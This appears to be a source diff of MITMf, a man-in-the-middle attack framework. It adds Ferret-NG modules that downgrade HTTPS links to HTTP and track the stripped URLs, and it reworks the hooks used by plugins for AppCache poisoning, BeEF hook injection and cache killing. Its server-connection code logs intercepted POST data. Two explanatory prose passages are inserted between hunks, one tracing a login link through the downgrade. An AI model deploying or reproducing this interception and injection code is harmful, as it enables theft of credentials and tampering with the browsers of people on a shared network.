mitmf_logger.info("[Ferret-NG] [ServerConnection] Client connection dropped before request finished.")
|
||||
|
||||
def replaceSecureLinks(self, data):
|
||||
|
||||
iterator = re.finditer(ServerConnection.urlExpression, data)
|
||||
|
||||
for match in iterator:
|
||||
url = match.group()
|
||||
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Found secure reference: " + url)
|
||||
|
||||
url = url.replace('https://', 'http://', 1)
|
||||
url = url.replace('&', '&')
|
||||
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
|
||||
|
||||
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
|
||||
return re.sub(ServerConnection.urlType, 'http://', data)
|
||||
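Concretely, an HTTPS reference in a server response reaches the client downgraded to HTTP, while URLMonitor remembers that this (client, url) pair must be proxied back out over SSL; with a hypothetical login link:

# response body contains: <a href="https://login.example.com/auth">
# the client receives:    <a href="http://login.example.com/auth">
# and urlMonitor.isSecureLink(client, 'http://login.example.com/auth') is now True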
|
||||
def shutdown(self):
|
||||
if not self.shutdownComplete:
|
||||
self.shutdownComplete = True
|
||||
try:
|
||||
self.client.finish()
|
||||
self.transport.loseConnection()
|
||||
except:
|
||||
pass
|
48 core/ferretNG/ServerConnectionFactory.py Normal file
|
@ -0,0 +1,48 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
from twisted.internet.protocol import ClientFactory
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class ServerConnectionFactory(ClientFactory):
|
||||
|
||||
def __init__(self, command, uri, postData, headers, client):
|
||||
self.command = command
|
||||
self.uri = uri
|
||||
self.postData = postData
|
||||
self.headers = headers
|
||||
self.client = client
|
||||
|
||||
def buildProtocol(self, addr):
|
||||
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
|
||||
|
||||
def clientConnectionFailed(self, connector, reason):
|
||||
mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.")
|
||||
|
||||
destination = connector.getDestination()
|
||||
|
||||
if (destination.port != 443):
|
||||
mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL")
|
||||
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
|
||||
else:
|
||||
try:
|
||||
self.client.finish()
|
||||
except:
|
||||
pass
|
85 core/ferretNG/URLMonitor.py Normal file
|
@ -0,0 +1,85 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import re
|
||||
import os
|
||||
import logging
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class URLMonitor:
|
||||
|
||||
'''
|
||||
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
|
||||
server is expecting over SSL. It also keeps track of secure favicon urls.
|
||||
'''
|
||||
|
||||
# Start the arms race, and end up here...
|
||||
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
|
||||
cookies = dict()
|
||||
_instance = None
|
||||
|
||||
def __init__(self):
|
||||
self.strippedURLs = set()
|
||||
self.strippedURLPorts = dict()
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
if URLMonitor._instance == None:
|
||||
URLMonitor._instance = URLMonitor()
|
||||
|
||||
return URLMonitor._instance
|
||||
|
||||
def isSecureLink(self, client, url):
|
||||
for expression in URLMonitor.javascriptTrickery:
|
||||
if (re.match(expression, url)):
|
||||
return True
|
||||
|
||||
return (client,url) in self.strippedURLs
|
||||
|
||||
def getSecurePort(self, client, url):
|
||||
if (client,url) in self.strippedURLs:
|
||||
return self.strippedURLPorts[(client,url)]
|
||||
else:
|
||||
return 443
|
||||
|
||||
def addSecureLink(self, client, url):
|
||||
methodIndex = url.find("//") + 2
|
||||
method = url[0:methodIndex]
|
||||
|
||||
pathIndex = url.find("/", methodIndex)
|
||||
if pathIndex == -1:
|
||||
pathIndex = len(url)
|
||||
url += "/"
|
||||
|
||||
host = url[methodIndex:pathIndex].lower()
|
||||
path = url[pathIndex:]
|
||||
|
||||
port = 443
|
||||
portIndex = host.find(":")
|
||||
|
||||
if (portIndex != -1):
|
||||
port = host[portIndex+1:]
|
||||
host = host[0:portIndex]
|
||||
if len(port) == 0:
|
||||
port = 443
|
||||
|
||||
url = method + host + path
|
||||
|
||||
self.strippedURLs.add((client, url))
|
||||
self.strippedURLPorts[(client, url)] = int(port)
|
|
@ -1,106 +0,0 @@
|
|||
"""Public Suffix List module for Python.
|
||||
"""
|
||||
|
||||
import codecs
|
||||
import os.path
|
||||
|
||||
class PublicSuffixList(object):
|
||||
def __init__(self, input_file=None):
|
||||
"""Reads and parses public suffix list.
|
||||
|
||||
input_file is a file object or another iterable that returns
|
||||
lines of a public suffix list file. If input_file is None, an
|
||||
UTF-8 encoded file named "publicsuffix.txt" in the same
|
||||
directory as this Python module is used.
|
||||
|
||||
The file format is described at http://publicsuffix.org/list/
|
||||
"""
|
||||
|
||||
if input_file is None:
|
||||
input_path = os.path.join(os.path.dirname(__file__), 'publicsuffix.txt')
|
||||
input_file = codecs.open(input_path, "r", "utf8")
|
||||
|
||||
root = self._build_structure(input_file)
|
||||
self.root = self._simplify(root)
|
||||
|
||||
def _find_node(self, parent, parts):
|
||||
if not parts:
|
||||
return parent
|
||||
|
||||
if len(parent) == 1:
|
||||
parent.append({})
|
||||
|
||||
assert len(parent) == 2
|
||||
negate, children = parent
|
||||
|
||||
child = parts.pop()
|
||||
|
||||
child_node = children.get(child, None)
|
||||
|
||||
if not child_node:
|
||||
children[child] = child_node = [0]
|
||||
|
||||
return self._find_node(child_node, parts)
|
||||
|
||||
def _add_rule(self, root, rule):
|
||||
if rule.startswith('!'):
|
||||
negate = 1
|
||||
rule = rule[1:]
|
||||
else:
|
||||
negate = 0
|
||||
|
||||
parts = rule.split('.')
|
||||
self._find_node(root, parts)[0] = negate
|
||||
|
||||
def _simplify(self, node):
|
||||
if len(node) == 1:
|
||||
return node[0]
|
||||
|
||||
return (node[0], dict((k, self._simplify(v)) for (k, v) in node[1].items()))
|
||||
|
||||
def _build_structure(self, fp):
|
||||
root = [0]
|
||||
|
||||
for line in fp:
|
||||
line = line.strip()
|
||||
if line.startswith('//') or not line:
|
||||
continue
|
||||
|
||||
self._add_rule(root, line.split()[0].lstrip('.'))
|
||||
|
||||
return root
|
||||
|
||||
def _lookup_node(self, matches, depth, parent, parts):
|
||||
if parent in (0, 1):
|
||||
negate = parent
|
||||
children = None
|
||||
else:
|
||||
negate, children = parent
|
||||
|
||||
matches[-depth] = negate
|
||||
|
||||
if depth < len(parts) and children:
|
||||
for name in ('*', parts[-depth]):
|
||||
child = children.get(name, None)
|
||||
if child is not None:
|
||||
self._lookup_node(matches, depth+1, child, parts)
|
||||
|
||||
def get_public_suffix(self, domain):
|
||||
"""get_public_suffix("www.example.com") -> "example.com"
|
||||
|
||||
Calling this function with a DNS name will return the
|
||||
public suffix for that name.
|
||||
|
||||
Note that for internationalized domains the list at
|
||||
http://publicsuffix.org uses decoded names, so it is
|
||||
up to the caller to decode any Punycode-encoded names.
|
||||
"""
|
||||
|
||||
parts = domain.lower().lstrip('.').split('.')
|
||||
hits = [None] * len(parts)
|
||||
|
||||
self._lookup_node(hits, 1, self.root, parts)
|
||||
|
||||
for i, what in enumerate(hits):
|
||||
if what is not None and what == 0:
|
||||
return '.'.join(parts[i:])
|
File diff suppressed because it is too large
|
@ -42,6 +42,10 @@ class ProxyPlugins:
|
|||
in handleResponse, but is still annoying.
|
||||
'''
|
||||
_instance = None
|
||||
|
||||
plist = []
|
||||
mthdDict = {"connectionMade": "clientRequest", "handleResponse": "serverResponse", "handleHeader": "serverHeaders", "handleEndHeaders":"serverHeaders"}
|
||||
pmthds = {}
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
|
@ -50,13 +54,9 @@ class ProxyPlugins:
|
|||
|
||||
return ProxyPlugins._instance
|
||||
|
||||
def setPlugins(self,plugins):
|
||||
def setPlugins(self, plugins):
|
||||
'''Set the plugins in use'''
|
||||
self.plist = []
|
||||
|
||||
#build a lookup list
|
||||
#need to clean up in future
|
||||
self.pmthds = {}
|
||||
|
||||
for p in plugins:
|
||||
self.addPlugin(p)
|
||||
|
||||
|
@ -66,17 +66,17 @@ class ProxyPlugins:
|
|||
'''Load a plugin'''
|
||||
self.plist.append(p)
|
||||
mitmf_logger.debug("[ProxyPlugins] Adding {} plugin".format(p.name))
|
||||
for mthd in p.implements:
|
||||
for mthd,pmthd in self.mthdDict.iteritems():
|
||||
try:
|
||||
self.pmthds[mthd].append(getattr(p,mthd))
|
||||
self.pmthds[mthd].append(getattr(p,pmthd))
|
||||
except KeyError:
|
||||
self.pmthds[mthd] = [getattr(p,mthd)]
|
||||
self.pmthds[mthd] = [getattr(p,pmthd)]
|
||||
|
||||
def removePlugin(self,p):
|
||||
'''Unload a plugin'''
|
||||
self.plist.remove(p)
|
||||
mitmf_logger.debug("[ProxyPlugins] Removing {} plugin".format(p.name))
|
||||
for mthd in p.implements:
|
||||
for mthd,pmthd in self.mthdDict.iteritems():
|
||||
self.pmthds[mthd].remove(p)
|
||||
|
||||
def hook(self):
|
||||
|
@ -92,9 +92,15 @@ class ProxyPlugins:
|
|||
args[key] = values[key]
|
||||
|
||||
#prevent self conflict
|
||||
args['request'] = args['self']
|
||||
if (fname == "handleResponse") or (fname == "handleHeader") or (fname == "handleEndHeaders"):
|
||||
args['request'] = args['self']
|
||||
args['response'] = args['self'].client
|
||||
else:
|
||||
args['request'] = args['self']
|
||||
|
||||
del args['self']
|
||||
|
||||
mitmf_logger.debug("[ProxyPlugins] hooking {}()".format(fname))
|
||||
#calls any plugin that has this hook
|
||||
try:
|
||||
for f in self.pmthds[fname]:
|
||||
|
|
|
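With the hook names now routed through mthdDict (connectionMade -> clientRequest, handleHeader/handleEndHeaders -> serverHeaders, handleResponse -> serverResponse), plugins implement the friendlier names instead of the raw sslstrip internals; the rewritten CacheKill and AppCachePoison further down follow exactly this shape. A bare-bones plugin under the new convention would look roughly like this (hypothetical example, for illustration only):

from plugins.plugin import Plugin

class Example(Plugin):
    name     = "Example"
    optname  = "example"
    desc     = "Demonstrates the new hook names"
    version  = "0.1"
    has_opts = False

    def initialize(self, options):
        self.options = options

    def clientRequest(self, request):               # was connectionMade
        request.headers['x-example'] = '1'          # tag outgoing requests (illustrative)

    def serverHeaders(self, response, request):     # was handleHeader/handleEndHeaders
        response.headers['Cache-Control'] = 'no-cache'

    def serverResponse(self, response, request, data):   # was handleResponse
        return {'response': response, 'request': request, 'data': data}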
@ -16,7 +16,13 @@
|
|||
# USA
|
||||
#
|
||||
|
||||
import urlparse, logging, os, sys, random, re, dns.resolver
|
||||
import urlparse
|
||||
import logging
|
||||
import os
|
||||
import sys
|
||||
import random
|
||||
import re
|
||||
import dns.resolver
|
||||
|
||||
from twisted.web.http import Request
|
||||
from twisted.web.http import HTTPChannel
|
||||
|
@ -33,7 +39,6 @@ from SSLServerConnection import SSLServerConnection
|
|||
from URLMonitor import URLMonitor
|
||||
from CookieCleaner import CookieCleaner
|
||||
from DnsCache import DnsCache
|
||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
|
@ -52,7 +57,6 @@ class ClientRequest(Request):
|
|||
self.hsts = URLMonitor.getInstance().hsts
|
||||
self.cookieCleaner = CookieCleaner.getInstance()
|
||||
self.dnsCache = DnsCache.getInstance()
|
||||
self.plugins = ProxyPlugins.getInstance()
|
||||
#self.uniqueId = random.randint(0, 10000)
|
||||
|
||||
#Use are own DNS server instead of reactor.resolve()
|
||||
|
@ -62,9 +66,6 @@ class ClientRequest(Request):
|
|||
def cleanHeaders(self):
|
||||
headers = self.getAllHeaders().copy()
|
||||
|
||||
#for k,v in headers.iteritems():
|
||||
# mitmf_logger.debug("[ClientRequest] Receiving headers: (%s => %s)" % (k, v))
|
||||
|
||||
if self.hsts:
|
||||
|
||||
if 'referer' in headers:
|
||||
|
@ -92,8 +93,6 @@ class ClientRequest(Request):
|
|||
if 'cache-control' in headers:
|
||||
del headers['cache-control']
|
||||
|
||||
self.plugins.hook()
|
||||
|
||||
return headers
|
||||
|
||||
def getPathFromUri(self):
|
||||
|
@ -111,7 +110,7 @@ class ClientRequest(Request):
|
|||
|
||||
if os.path.exists(scriptPath): return scriptPath
|
||||
|
||||
mitmf_logger.warning("Error: Could not find lock.ico")
|
||||
mitmf_logger.warning("[ClientRequest] Error: Could not find lock.ico")
|
||||
return "lock.ico"
|
||||
|
||||
def handleHostResolvedSuccess(self, address):
|
||||
|
|
|
@ -16,14 +16,16 @@
|
|||
# USA
|
||||
#
|
||||
|
||||
import logging, re, string, random, zlib, gzip, StringIO, sys
|
||||
import plugins
|
||||
|
||||
try:
|
||||
from user_agents import parse
|
||||
except:
|
||||
pass
|
||||
import logging
|
||||
import re
|
||||
import string
|
||||
import random
|
||||
import zlib
|
||||
import gzip
|
||||
import StringIO
|
||||
import sys
|
||||
|
||||
from user_agents import parse
|
||||
from twisted.web.http import HTTPClient
|
||||
from URLMonitor import URLMonitor
|
||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
|
@ -53,6 +55,7 @@ class ServerConnection(HTTPClient):
|
|||
self.postData = postData
|
||||
self.headers = headers
|
||||
self.client = client
|
||||
self.printPostData = True
|
||||
self.clientInfo = None
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.hsts = URLMonitor.getInstance().hsts
|
||||
|
@ -78,22 +81,17 @@ class ServerConnection(HTTPClient):
|
|||
mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host']))
|
||||
mitmf_logger.debug("[ServerConnection] Full request: {}{}".format(self.headers['host'], self.uri))
|
||||
|
||||
self.plugins.hook()
|
||||
self.sendCommand(self.command, self.uri)
|
||||
|
||||
def sendHeaders(self):
|
||||
for header, value in self.headers.iteritems():
|
||||
mitmf_logger.debug("[ServerConnection] Sending header: ({} => {})".format(header, value))
|
||||
mitmf_logger.debug("[ServerConnection] Sending header: ({}: {})".format(header, value))
|
||||
self.sendHeader(header, value)
|
||||
|
||||
self.endHeaders()
|
||||
|
||||
def sendPostData(self):
|
||||
if 'clientprfl' in self.uri:
|
||||
self.plugins.hook()
|
||||
elif 'keylog' in self.uri:
|
||||
self.plugins.hook()
|
||||
else:
|
||||
if self.printPostData is True: #So we can disable printing POST data coming from plugins
|
||||
try:
|
||||
postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
|
||||
if len(postdata) > 0:
|
||||
|
@ -101,8 +99,9 @@ class ServerConnection(HTTPClient):
|
|||
except (UnicodeDecodeError, UnicodeEncodeError):
|
||||
mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host']))
|
||||
pass
|
||||
|
||||
self.transport.write(self.postData)
|
||||
|
||||
self.printPostData = True
|
||||
self.transport.write(self.postData)
|
||||
|
||||
def connectionMade(self):
|
||||
mitmf_logger.debug("[ServerConnection] HTTP connection made.")
|
||||
|
@ -118,8 +117,6 @@ class ServerConnection(HTTPClient):
|
|||
self.client.setResponseCode(int(code), message)
|
||||
|
||||
def handleHeader(self, key, value):
|
||||
mitmf_logger.debug("[ServerConnection] Receiving header ({}: {})".format(key, value))
|
||||
|
||||
if (key.lower() == 'location'):
|
||||
value = self.replaceSecureLinks(value)
|
||||
if self.app:
|
||||
|
@ -128,11 +125,11 @@ class ServerConnection(HTTPClient):
|
|||
if (key.lower() == 'content-type'):
|
||||
if (value.find('image') != -1):
|
||||
self.isImageRequest = True
|
||||
mitmf_logger.debug("[ServerConnection] Response is image content, not scanning...")
|
||||
mitmf_logger.debug("[ServerConnection] Response is image content, not scanning")
|
||||
|
||||
if (key.lower() == 'content-encoding'):
|
||||
if (value.find('gzip') != -1):
|
||||
mitmf_logger.debug("[ServerConnection] Response is compressed...")
|
||||
mitmf_logger.debug("[ServerConnection] Response is compressed")
|
||||
self.isCompressed = True
|
||||
|
||||
elif (key.lower()== 'strict-transport-security'):
|
||||
|
@ -147,15 +144,19 @@ class ServerConnection(HTTPClient):
|
|||
else:
|
||||
self.client.setHeader(key, value)
|
||||
|
||||
def handleEndHeaders(self):
|
||||
if (self.isImageRequest and self.contentLength != None):
|
||||
self.client.setHeader("Content-Length", self.contentLength)
|
||||
|
||||
if self.length == 0:
|
||||
self.shutdown()
|
||||
|
||||
self.plugins.hook()
|
||||
|
||||
def handleEndHeaders(self):
|
||||
if (self.isImageRequest and self.contentLength != None):
|
||||
self.client.setHeader("Content-Length", self.contentLength)
|
||||
if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG":
|
||||
for header, value in self.client.headers.iteritems():
|
||||
mitmf_logger.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value))
|
||||
|
||||
if self.length == 0:
|
||||
self.shutdown()
|
||||
|
||||
def handleResponsePart(self, data):
|
||||
if (self.isImageRequest):
|
||||
self.client.write(data)
|
||||
|
@ -175,15 +176,11 @@ class ServerConnection(HTTPClient):
|
|||
if (self.isCompressed):
|
||||
mitmf_logger.debug("[ServerConnection] Decompressing content...")
|
||||
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
|
||||
|
||||
if len(data) < 1500:
|
||||
mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data:\n{}".format(len(data), data))
|
||||
else:
|
||||
mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
|
||||
|
||||
data = self.replaceSecureLinks(data)
|
||||
res = self.plugins.hook()
|
||||
data = res['data']
|
||||
data = self.plugins.hook()['data']
|
||||
|
||||
mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
|
||||
|
||||
if (self.contentLength != None):
|
||||
self.client.setHeader('Content-Length', len(data))
|
||||
|
@ -212,7 +209,7 @@ class ServerConnection(HTTPClient):
|
|||
for match in iterator:
|
||||
url = match.group()
|
||||
|
||||
mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
|
||||
mitmf_logger.debug("[ServerConnection][HSTS] Found secure reference: " + url)
|
||||
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
|
||||
mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
|
||||
sustitucion[url] = nuevaurl
|
||||
|
|
|
@ -30,51 +30,6 @@ from scapy.all import get_if_addr, get_if_hwaddr
|
|||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class ImportDir:
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
# http://gitlab.com/aurelien-lourot/importdir
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
|
||||
# File name of a module:
|
||||
__module_file_regexp = "(.+)\.py(c?)$"
|
||||
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
# Interface
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
|
||||
def do(self, path, env):
|
||||
""" Imports all modules residing directly in directory "path" into the provided environment
|
||||
(usually the callers environment). A typical call:
|
||||
importdir.do("example_dir", globals())
|
||||
"""
|
||||
self.__do(path, env)
|
||||
|
||||
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
# Implementation
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
|
||||
def get_module_names_in_dir(self, path):
|
||||
""" Returns a set of all module names residing directly in directory "path".
|
||||
"""
|
||||
result = set()
|
||||
|
||||
# Looks for all python files in the directory (not recursively) and add their name to result:
|
||||
for entry in os.listdir(path):
|
||||
if os.path.isfile(os.path.join(path, entry)):
|
||||
regexp_result = re.search(self.__module_file_regexp, entry)
|
||||
if regexp_result: # is a module file name
|
||||
result.add(regexp_result.groups()[0])
|
||||
|
||||
return result
|
||||
|
||||
def __do(self, path, env):
|
||||
""" Implements do().
|
||||
"""
|
||||
sys.path.append(path) # adds provided directory to list we can import from
|
||||
for module_name in sorted(self.get_module_names_in_dir(path)): # for each found module...
|
||||
env[module_name] = __import__(module_name) # ... import
|
||||
|
||||
class SystemConfig:
|
||||
|
||||
@staticmethod
|
||||
|
|
10 mitmf.py
|
@ -83,7 +83,7 @@ try:
|
|||
sgroup.add_argument("--{}".format(p.optname), action="store_true",help="Load plugin {}".format(p.name))
|
||||
|
||||
if p.has_opts:
|
||||
p.add_options(sgroup)
|
||||
p.pluginOptions(sgroup)
|
||||
|
||||
arg_dict[p.optname] = vars(sgroup)['_group_actions']
|
||||
|
||||
|
@ -101,10 +101,10 @@ args = parser.parse_args()
|
|||
for plugin, options in arg_dict.iteritems():
|
||||
if vars(args)[plugin] is False:
|
||||
for option in options:
|
||||
if vars(args)[option.dest] is True:
|
||||
sys.exit("[-] Called plugin options without invoking --{}".format(plugin))
|
||||
if vars(args)[option.dest]:
|
||||
sys.exit("[-] Called plugin options without invoking the actual plugin (--{})".format(plugin))
|
||||
|
||||
#first check to see if we supplied a valid interface
|
||||
#check to see if we supplied a valid interface
|
||||
myip = SystemConfig.getIP(args.interface)
|
||||
mymac = SystemConfig.getMAC(args.interface)
|
||||
|
||||
|
@ -181,7 +181,7 @@ from core.dnschef.DNSchef import DNSChef
|
|||
DNSChef.getInstance().start()
|
||||
print "|_ DNSChef v{} online".format(DNSChef.version)
|
||||
|
||||
#start the SMB server
|
||||
#Start the SMB server
|
||||
from core.protocols.smb.SMBserver import SMBserver
|
||||
print "|_ SMBserver online (Impacket {})\n".format(SMBserver.impacket_ver)
|
||||
SMBserver().start()
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
# Copyright (c) 2014-2016 Krzysztof Kotowicz, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
|
@ -18,8 +18,6 @@
|
|||
# USA
|
||||
#
|
||||
|
||||
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
|
||||
|
||||
import logging
|
||||
import re
|
||||
import os.path
|
||||
|
@ -33,10 +31,9 @@ from core.sslstrip.URLMonitor import URLMonitor
|
|||
mitmf_logger = logging.getLogger("mitmf")
|
||||
|
||||
class AppCachePlugin(Plugin):
|
||||
name = "App Cache Poison"
|
||||
name = "AppCachePoison"
|
||||
optname = "appoison"
|
||||
desc = "Performs App Cache Poisoning attacks"
|
||||
implements = ["handleResponse"]
|
||||
version = "0.3"
|
||||
has_opts = False
|
||||
|
||||
|
@ -47,7 +44,9 @@ class AppCachePlugin(Plugin):
|
|||
|
||||
self.urlMonitor.setAppCachePoisoning()
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
def serverResponse(self, response, request, data):
|
||||
|
||||
#This code was literally copied + pasted from Koto's sslstrip fork, def need to clean this up in the near future
|
||||
|
||||
self.app_config = self.config['AppCachePoison'] # so we reload the config on each request
|
||||
url = request.client.uri
|
||||
|
@ -60,22 +59,22 @@ class AppCachePlugin(Plugin):
|
|||
if "enable_only_in_useragents" in self.app_config:
|
||||
regexp = self.app_config["enable_only_in_useragents"]
|
||||
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
||||
mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
|
||||
return {'request': request, 'data': data}
|
||||
mitmf_logger.info("{} [{}] Tampering disabled in this useragent ({})".format(ip, self.name, req_headers["user-agent"]))
|
||||
return {'response': response, 'request': request, 'data': data}
|
||||
|
||||
urls = self.urlMonitor.getRedirectionSet(url)
|
||||
mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
|
||||
mitmf_logger.debug("{} [{}] Got redirection set: {}".format(ip,self.name, urls))
|
||||
(name,s,element,url) = self.getSectionForUrls(urls)
|
||||
|
||||
if s is False:
|
||||
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
||||
return {'request': request, 'data': data}
|
||||
return {'response': response, 'request': request, 'data': data}
|
||||
|
||||
mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name))
|
||||
mitmf_logger.info("{} [{}] Found URL {} in section {}".format(ip, self.name, url, name))
|
||||
p = self.getTemplatePrefix(s)
|
||||
|
||||
if element == 'tamper':
|
||||
mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p))
|
||||
mitmf_logger.info("{} [{}] Poisoning tamper URL with template {}".format(ip, self.name, p))
|
||||
if os.path.exists(p + '.replace'): # replace whole content
|
||||
f = open(p + '.replace','r')
|
||||
data = self.decorate(f.read(), s)
|
||||
|
@ -92,12 +91,12 @@ class AppCachePlugin(Plugin):
|
|||
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
|
||||
|
||||
elif element == "manifest":
|
||||
mitmf_logger.info("%s Poisoning manifest URL" % ip)
|
||||
mitmf_logger.info("{} [{}] Poisoning manifest URL".format(ip, self.name))
|
||||
data = self.getSpoofedManifest(url, s)
|
||||
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
|
||||
|
||||
elif element == "raw": # raw resource to modify, it does not have to be html
|
||||
mitmf_logger.info("%s Poisoning raw URL" % ip)
|
||||
mitmf_logger.info("{} [{}] Poisoning raw URL".format(ip, self.name))
|
||||
if os.path.exists(p + '.replace'): # replace whole content
|
||||
f = open(p + '.replace','r')
|
||||
data = self.decorate(f.read(), s)
|
||||
|
@ -112,7 +111,7 @@ class AppCachePlugin(Plugin):
|
|||
|
||||
self.cacheForFuture(headers)
|
||||
self.removeDangerousHeaders(headers)
|
||||
return {'request': request, 'data': data}
|
||||
return {'response': response, 'request': request, 'data': data}
|
||||
|
||||
def tryMassPoison(self, url, data, headers, req_headers, ip):
|
||||
browser_id = ip + req_headers.get("user-agent", "")
|
||||
|
@ -130,7 +129,7 @@ class AppCachePlugin(Plugin):
|
|||
if not re.search(self.app_config['mass_poison_url_match'], url): #different url
|
||||
return data
|
||||
|
||||
mitmf_logger.debug("Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
|
||||
mitmf_logger.debug("[{}] Adding AppCache mass poison for URL {}, id {}".format(self.name, url, browser_id))
|
||||
appendix = self.getMassPoisonHtml()
|
||||
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
|
||||
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
|
||||
|
@ -202,5 +201,3 @@ class AppCachePlugin(Plugin):
|
|||
return (name, section, 'raw',url)
|
||||
|
||||
return (None, False,'',urls.copy().pop())
|
||||
|
||||
|
||||
|
|
|
@@ -27,15 +27,15 @@ from core.beefapi import BeefAPI
from core.utils import SystemConfig
from plugins.plugin import Plugin
from plugins.Inject import Inject
from core.sergioproxy.ProxyPlugins import ProxyPlugins

mitmf_logger = logging.getLogger("mitmf")

class BeefAutorun(Inject, Plugin):
class BeefAutorun(Plugin):
name = "BeEFAutorun"
optname = "beefauto"
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
tree_output = []
depends = ["Inject"]
version = "0.3"
has_opts = False
File diff suppressed because one or more lines are too long
@@ -18,28 +18,28 @@
# USA
#

import logging
from plugins.plugin import Plugin

mitmf_logger = logging.getLogger("mitmf")

class CacheKill(Plugin):
name = "CacheKill"
optname = "cachekill"
desc = "Kills page caching by modifying headers"
implements = ["handleHeader", "connectionMade"]
bad_headers = ['if-none-match', 'if-modified-since']
version = "0.1"
has_opts = True

def add_options(self, options):
options.add_argument("--preserve-cookies", action="store_true", help="Preserve cookies (will allow caching in some situations).")
def initialize(self, options):
self.bad_headers = ['if-none-match', 'if-modified-since']

def handleHeader(self, request, key, value):
def serverHeaders(self, response, request):
'''Handles all response headers'''
request.client.headers['Expires'] = "0"
request.client.headers['Cache-Control'] = "no-cache"
response.headers['Expires'] = "0"
response.headers['Cache-Control'] = "no-cache"

def connectionMade(self, request):
def clientRequest(self, request):
'''Handles outgoing request'''
request.headers['Pragma'] = 'no-cache'
for h in self.bad_headers:
if h in request.headers:
request.headers[h] = ""
request.headers['pragma'] = 'no-cache'
for header in self.bad_headers:
if header in request.headers:
del request.headers[header]

plugins/FerretNG.py (new file, 60 lines)
@@ -0,0 +1,60 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
